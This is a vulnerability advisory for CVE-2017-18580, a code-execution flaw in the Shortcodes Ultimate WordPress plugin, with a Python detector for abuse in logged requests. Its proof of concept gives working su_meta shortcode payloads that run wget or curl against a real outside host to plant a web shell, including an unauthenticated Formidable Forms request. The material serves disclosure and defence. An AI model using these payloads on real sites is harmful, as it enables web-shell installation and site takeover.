Shortcodes Ultimate <= 5.0.0 - Authenticated Contributor Code Execution

Description
The Shortcodes Ultimate plugin does not sanitize the "filter" argument to the "su_meta", "su_user", and "su_post" shortcodes, allowing the filter to be set to the "system()" function which runs arbitrary code.

This is being exploited in the wild; I discovered this through analysis of mod_security audit logs on two compromised sites today.

Proof of Concept
If a contributor creates a draft post with this text:

[su_meta key=1 post_id=1 default='wget http://sazinco.ir/wp-content/shell.txt -O test.php' filter='system']

... then previews that post, Shortcodes Ultimate will run the code and save the malicious file as "test.php".

This is a simplified version of an exploit I saw this morning, which didn't require a contributor role account because it took advantage of the fact that another plugin ("Formidable Forms") accepts untrusted input and passes it to do_shortcode(). That looked like this:

POST /wp-admin/admin-ajax.php HTTP/1.1

action=frm_forms_preview&form={'asdf-asdf'}&before_html=[su_meta key=1 post_id=1 default='curl http://sazinco.ir/wp-content/shell.txt > ../wp-content/upoad.php' filter='system']&custom_style=1
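As an added detection example (not part of this advisory, and not WPScan's or the plugin's code): it scans request bodies like the two above, as they would appear in a mod_security audit log, URL-decodes them, and flags any of the three affected shortcodes whose filter attribute names something outside a small allowlist of formatting functions. The allowlist, the sample requests and the example.invalid host are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Shortcodes whose "filter" attribute is passed to a callable (per the advisory).
AFFECTED = ("su_meta", "su_user", "su_post")

# Constructed allowlist: harmless formatting filters a site might use on purpose.
# Anything else in filter= (system, exec, ...) is reported; an absent filter is fine.
ALLOWED_FILTERS = {"", "esc_html", "esc_attr", "wp_kses_post", "strtoupper", "strtolower", "trim"}

SHORTCODE_RE = re.compile(r"\[(su_meta|su_user|su_post)\b([^\]]*)\]", re.I)
# key=value, value either single-quoted, double-quoted or bare.
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|(\S+))""")


def parse_attrs(body: str) -> dict:
    """Turn `key=1 filter='system'` into {'key': '1', 'filter': 'system'}."""
    attrs = {}
    for m in ATTR_RE.finditer(body):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def find_abuse(request_body: str) -> list:
    """Return (shortcode, filter, default) for each affected shortcode whose
    filter is not allowlisted. The body is URL-decoded first so that encoded
    admin-ajax.php POST data is inspected in the same form do_shortcode() sees."""
    decoded = unquote_plus(request_body)
    hits = []
    for m in SHORTCODE_RE.finditer(decoded):
        attrs = parse_attrs(m.group(2))
        flt = attrs.get("filter", "")
        if flt.lower() not in ALLOWED_FILTERS:
            hits.append((m.group(1).lower(), flt, attrs.get("default", "")))
    return hits


# Constructed sample bodies in the shape of the advisory's PoCs (placeholder host).
SAMPLE_REQUESTS = [
    # draft-post preview, URL-encoded as a browser would send it
    "content=%5Bsu_meta+key%3D1+post_id%3D1+default%3D%27wget+http%3A%2F%2Fexample.invalid"
    "%2Fshell.txt+-O+test.php%27+filter%3D%27system%27%5D",
    # Formidable Forms preview path, as in the second PoC
    "action=frm_forms_preview&form={'asdf-asdf'}&before_html=[su_meta key=1 post_id=1 "
    "default='curl http://example.invalid/shell.txt > ../wp-content/upoad.php' filter='system']&custom_style=1",
    # legitimate use of an allowlisted filter: must not be flagged
    "content=[su_meta key=subtitle post_id=7 filter='esc_html']",
]

if __name__ == "__main__":
    for body in SAMPLE_REQUESTS:
        print(find_abuse(body))
```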

Affects Plugin

fixed in version 5.0.1

References

CVE 2017-18580
URL https://plugins.trac.wordpress.org/changeset/1756323/shortcodes-ultimate
URL https://blog.sucuri.net/2017/11/formidable-forms-shortcodes-ultimate-exploits-in-the-wild.html

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Submitter Robert Mathews
Submitter Website https://tigertech.net/
Submitter Twitter @TigerTech
Views 5538
Verified No
WPVDB ID 8945

Timeline

Publicly Published 2017-10-31 (almost 2 years ago)
Added 2017-11-07 (almost 2 years ago)
Last Updated 2019-08-22 (about 2 months ago)
